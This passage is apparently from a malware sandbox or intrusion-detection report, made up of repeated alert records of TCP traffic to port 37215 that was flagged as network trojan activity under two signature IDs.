                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315516
                  SID:2835222
                  Source Port:57626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:09.531251
                  SID:2829579
                  Source Port:45374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.926991
                  SID:2835222
                  Source Port:58984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910519
                  SID:2829579
                  Source Port:48826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942528
                  SID:2829579
                  Source Port:38088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719496
                  SID:2835222
                  Source Port:49868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695118
                  SID:2835222
                  Source Port:57630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563566
                  SID:2829579
                  Source Port:34468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790305
                  SID:2835222
                  Source Port:37726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696709
                  SID:2835222
                  Source Port:43542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695138
                  SID:2829579
                  Source Port:35402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.931110
                  SID:2835222
                  Source Port:51978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.926743
                  SID:2829579
                  Source Port:58618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651365
                  SID:2829579
                  Source Port:41554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.889449
                  SID:2829579
                  Source Port:56918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489918
                  SID:2829579
                  Source Port:59840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718876
                  SID:2835222
                  Source Port:51420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587015
                  SID:2835222
                  Source Port:45430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664809
                  SID:2835222
                  Source Port:38504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887162
                  SID:2829579
                  Source Port:50532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493184
                  SID:2835222
                  Source Port:38992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.691265
                  SID:2829579
                  Source Port:42602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.602437
                  SID:2829579
                  Source Port:32786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.353810
                  SID:2835222
                  Source Port:59584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870951
                  SID:2829579
                  Source Port:50674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745922
                  SID:2829579
                  Source Port:46342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628964
                  SID:2829579
                  Source Port:35014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885968
                  SID:2835222
                  Source Port:34890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695733
                  SID:2829579
                  Source Port:40328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530281
                  SID:2835222
                  Source Port:58310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911709
                  SID:2829579
                  Source Port:53810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886174
                  SID:2835222
                  Source Port:34920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656492
                  SID:2829579
                  Source Port:38426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766272
                  SID:2835222
                  Source Port:48794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316596
                  SID:2829579
                  Source Port:47520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527587
                  SID:2835222
                  Source Port:39728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.590036
                  SID:2835222
                  Source Port:48734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660545
                  SID:2835222
                  Source Port:48564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.684145
                  SID:2829579
                  Source Port:38838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720015
                  SID:2835222
                  Source Port:55778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583175
                  SID:2829579
                  Source Port:44374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.586393
                  SID:2829579
                  Source Port:37544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806147
                  SID:2835222
                  Source Port:58318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.932520
                  SID:2835222
                  Source Port:48980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.510751
                  SID:2829579
                  Source Port:34262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628961
                  SID:2829579
                  Source Port:55770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907258
                  SID:2835222
                  Source Port:42388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294606
                  SID:2835222
                  Source Port:46772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650776
                  SID:2835222
                  Source Port:46800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628366
                  SID:2829579
                  Source Port:36818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886261
                  SID:2835222
                  Source Port:40656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.749972
                  SID:2835222
                  Source Port:60508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529775
                  SID:2835222
                  Source Port:60342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300247
                  SID:2835222
                  Source Port:56628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.821083
                  SID:2835222
                  Source Port:43396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737744
                  SID:2829579
                  Source Port:49302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.927107
                  SID:2835222
                  Source Port:47608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790509
                  SID:2829579
                  Source Port:42264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930496
                  SID:2835222
                  Source Port:47698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657636
                  SID:2829579
                  Source Port:46448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494420
                  SID:2835222
                  Source Port:41444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650815
                  SID:2829579
                  Source Port:41042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659549
                  SID:2835222
                  Source Port:56698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906114
                  SID:2835222
                  Source Port:48990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628805
                  SID:2829579
                  Source Port:41262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695245
                  SID:2829579
                  Source Port:40784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766450
                  SID:2829579
                  Source Port:57310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.608635
                  SID:2835222
                  Source Port:34738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781093
                  SID:2835222
                  Source Port:52080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491370
                  SID:2835222
                  Source Port:56464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655646
                  SID:2829579
                  Source Port:49356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844991
                  SID:2835222
                  Source Port:50448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537269
                  SID:2835222
                  Source Port:54224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.837217
                  SID:2829579
                  Source Port:48634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911170
                  SID:2835222
                  Source Port:36490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542783
                  SID:2835222
                  Source Port:37328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846426
                  SID:2829579
                  Source Port:52960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.531484
                  SID:2829579
                  Source Port:55786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537498
                  SID:2829579
                  Source Port:36244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.453796
                  SID:2835222
                  Source Port:52166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.307616
                  SID:2835222
                  Source Port:44062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806007
                  SID:2835222
                  Source Port:42058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742352
                  SID:2829579
                  Source Port:57518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790326
                  SID:2829579
                  Source Port:44438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.689566
                  SID:2835222
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695777
                  SID:2835222
                  Source Port:59458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874500
                  SID:2835222
                  Source Port:37548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585266
                  SID:2835222
                  Source Port:50390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768514
                  SID:2829579
                  Source Port:39018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493151
                  SID:2829579
                  Source Port:57924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.670732
                  SID:2835222
                  Source Port:55424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548307
                  SID:2835222
                  Source Port:40584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908669
                  SID:2829579
                  Source Port:47052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547628
                  SID:2835222
                  Source Port:35804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549331
                  SID:2829579
                  Source Port:45684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.693809
                  SID:2835222
                  Source Port:41412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548281
                  SID:2835222
                  Source Port:32984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886189
                  SID:2835222
                  Source Port:55658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.792811
                  SID:2829579
                  Source Port:35294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660450
                  SID:2835222
                  Source Port:49348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.926516
                  SID:2829579
                  Source Port:59666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489517
                  SID:2835222
                  Source Port:59106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315517
                  SID:2829579
                  Source Port:51118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659524
                  SID:2835222
                  Source Port:37394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790952
                  SID:2835222
                  Source Port:56208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.771032
                  SID:2829579
                  Source Port:41188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279428
                  SID:2829579
                  Source Port:40688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.794818
                  SID:2835222
                  Source Port:35800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293094
                  SID:2829579
                  Source Port:36430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.860120
                  SID:2829579
                  Source Port:50072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315440
                  SID:2829579
                  Source Port:44474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766200
                  SID:2829579
                  Source Port:60404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.866277
                  SID:2835222
                  Source Port:54368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296150
                  SID:2835222
                  Source Port:57916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316500
                  SID:2835222
                  Source Port:39048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555130
                  SID:2829579
                  Source Port:47630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563526
                  SID:2829579
                  Source Port:40352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788958
                  SID:2835222
                  Source Port:34126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.926516
                  SID:2829579
                  Source Port:51706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529696
                  SID:2829579
                  Source Port:42394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488687
                  SID:2835222
                  Source Port:51198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628425
                  SID:2829579
                  Source Port:60576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.689596
                  SID:2835222
                  Source Port:47024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874017
                  SID:2835222
                  Source Port:59126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.925908
                  SID:2829579
                  Source Port:36066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788973
                  SID:2829579
                  Source Port:47998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788937
                  SID:2829579
                  Source Port:60836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578071
                  SID:2829579
                  Source Port:34876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887818
                  SID:2829579
                  Source Port:59510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527407
                  SID:2835222
                  Source Port:40202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874526
                  SID:2829579
                  Source Port:52304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.602474
                  SID:2835222
                  Source Port:46212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546663
                  SID:2829579
                  Source Port:52418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.881388
                  SID:2835222
                  Source Port:42234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.857555
                  SID:2835222
                  Source Port:40748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794540
                  SID:2835222
                  Source Port:55854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900355
                  SID:2829579
                  Source Port:35748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719498
                  SID:2835222
                  Source Port:34032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542775
                  SID:2835222
                  Source Port:54552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844969
                  SID:2835222
                  Source Port:37154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786487
                  SID:2835222
                  Source Port:36744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.866388
                  SID:2835222
                  Source Port:53104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.587001
                  SID:2829579
                  Source Port:48322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742929
                  SID:2829579
                  Source Port:60510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586331
                  SID:2829579
                  Source Port:46144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.603995
                  SID:2835222
                  Source Port:42904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775790
                  SID:2835222
                  Source Port:52470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.323478
                  SID:2829579
                  Source Port:56370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911549
                  SID:2835222
                  Source Port:52584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791644
                  SID:2829579
                  Source Port:39696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742831
                  SID:2829579
                  Source Port:59710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770980
                  SID:2829579
                  Source Port:37294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900396
                  SID:2829579
                  Source Port:53240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767562
                  SID:2829579
                  Source Port:54912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.868985
                  SID:2829579
                  Source Port:49672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.497790
                  SID:2829579
                  Source Port:56448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.916882
                  SID:2829579
                  Source Port:58430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277322
                  SID:2829579
                  Source Port:35650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.881155
                  SID:2829579
                  Source Port:60062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491392
                  SID:2835222
                  Source Port:48806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547518
                  SID:2829579
                  Source Port:42358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549235
                  SID:2835222
                  Source Port:49142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.662057
                  SID:2835222
                  Source Port:48660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583512
                  SID:2829579
                  Source Port:51928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579767
                  SID:2829579
                  Source Port:33688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578931
                  SID:2835222
                  Source Port:60942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293175
                  SID:2835222
                  Source Port:49630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775941
                  SID:2835222
                  Source Port:55646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550561
                  SID:2829579
                  Source Port:59358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530413
                  SID:2835222
                  Source Port:34278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790509
                  SID:2835222
                  Source Port:35036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849002
                  SID:2835222
                  Source Port:37732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528177
                  SID:2829579
                  Source Port:35022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292767
                  SID:2835222
                  Source Port:51088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517522
                  SID:2835222
                  Source Port:43052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798187
                  SID:2829579
                  Source Port:39604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555904
                  SID:2829579
                  Source Port:54620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650774
                  SID:2829579
                  Source Port:38822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.320177
                  SID:2835222
                  Source Port:45536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931495
                  SID:2829579
                  Source Port:48114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907966
                  SID:2835222
                  Source Port:34182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.916686
                  SID:2835222
                  Source Port:44232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661170
                  SID:2835222
